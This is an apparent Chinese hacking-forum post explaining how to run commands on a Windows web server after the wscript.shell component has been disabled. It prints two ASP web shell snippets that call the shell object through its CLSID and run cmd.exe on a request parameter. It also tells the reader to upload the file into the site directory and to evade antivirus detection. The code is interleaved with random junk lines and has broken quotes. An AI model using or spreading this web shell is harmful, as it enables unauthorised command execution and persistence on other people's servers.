中国网络渗透测试联盟
标题:
没有wscript.shell组件提权方法
[打印本页]
作者:
admin
时间:
2012-10-21 09:08
标题:
没有wscript.shell组件提权方法
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
1 F' f' q1 }, f: `9 D5 g+ X
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
- H7 D# a& `" G- T$ w, j" T
要想让运行命令可以试试这种方法,成功率为五五之数。
% a# p; H0 @4 N1 A8 b
把下面代码复制:
1 F" {( u) c: o, L% F; g* \1 X
<%
8 \$ b' f' _+ L' `( V) s
end if
4 r3 V0 S5 `+ y3 |/ Y2 T/ l0 e8 H
response.write(”")
5 t7 B( p9 T6 n/ I, R
On Error Resume
: S' q, w0 w% M1 g% e
Next
7 L, A; I: n1 q9 S( B3 Y( }
response.write oScriptlhn.exec(”cmd.exe /c” &
4 w3 x) z" m# b& @) |
request(”c”)).stdout.readall
# K; y1 |! i" J) X
response.write(”")
# y* y# u* m8 p
response.write(”")
7 W d; M% [# |6 _: f9 V8 H
response.write(”
/ i4 {8 X7 J" p* e
“)
/ k- \+ {' k2 q8 ~ h
response.write(”")
5 Y! |5 j0 O# E* p; F* _
%>
9 \/ k [, g2 R# o
保存为一个asp文件,然后传到网站目录上去
! E' }) o2 @- _( } I
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
* p$ I. J4 E& |6 ]2 R7 C
我用此成功运行过cacls命令。
# z, D5 X0 h& O+ e5 V6 {$ `7 v/ m( T
第二那就是运行时出错,可能限制某些代码执行
4 H: c# g0 C+ ?8 k9 Z
无wscript.shell组件提权又一个方法
- _5 |7 Z( ]- R/ _# H( \
<object runat=server id=oScriptlhn scope=page
! w* Y8 j9 e) j
: W% _, q7 [ q M# J, Z
classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>
2 c+ e/ C* V0 f5 x5 b
<%if err then%>
8 f- Y$ k8 x. t7 w- U. E& ~& e# E
<object runat=server id=oScriptlhn scope=page
a& _! E# D. T$ G- C
: D$ N8 D' b7 R" Z
classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
$ P* {3 G' x8 s: V# ]
<%
: v/ {8 J% }3 N
end if
?1 ?3 Y! _ t {1 u, Y$ P1 F* C
response.write(”<textarea readonly cols=80
' T$ H& O8 J/ E0 w+ O( }. E+ j
. n( p% I! Y1 X( |/ G/ s
rows=20>”)
% F5 i- _4 D! o5 e; r9 ^5 B
On Error Resume Next
* t6 h j5 ~. s. d( U' q5 ]
response.write
c8 Q5 w4 C: M, u: d+ I
/ R% K$ P* u( q' |- Q- e
oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
5 u( M( A6 ~% R+ r; Q# X
response.write(”</textarea>”)
, \2 {3 i( k! x8 s+ m: Z7 L
response.write(”<form
: p! j7 a8 P4 y9 x+ ^, a
' _- ^2 a p; D& S( M2 e: e9 d
method=’post’>”)
# D8 k& a/ V' C0 {8 _) ?0 O
response.write(”<input type=text name=’c'
. b) O0 e% p: _, R2 h f. ]0 l$ m8 j
1 _* ^; Q% Y; l7 d/ m5 H! C! n
size=60><br>”)
" i7 z; f1 L6 c; @9 D9 i
response.write(”<input type=submit
* S- t7 N# @7 s! W
# z7 g( [$ M _/ |
value=’执行’></form>”)
8 Z' K. v# v/ `. J4 b+ M
%>
* d1 w- z! M3 x& n
保存为ASP,此代码可能被杀,请注意免杀。
0 L; ]3 B: V+ E8 S, b" O" o0 R
原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建
3 x- `8 d1 H1 ]
复制代码
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2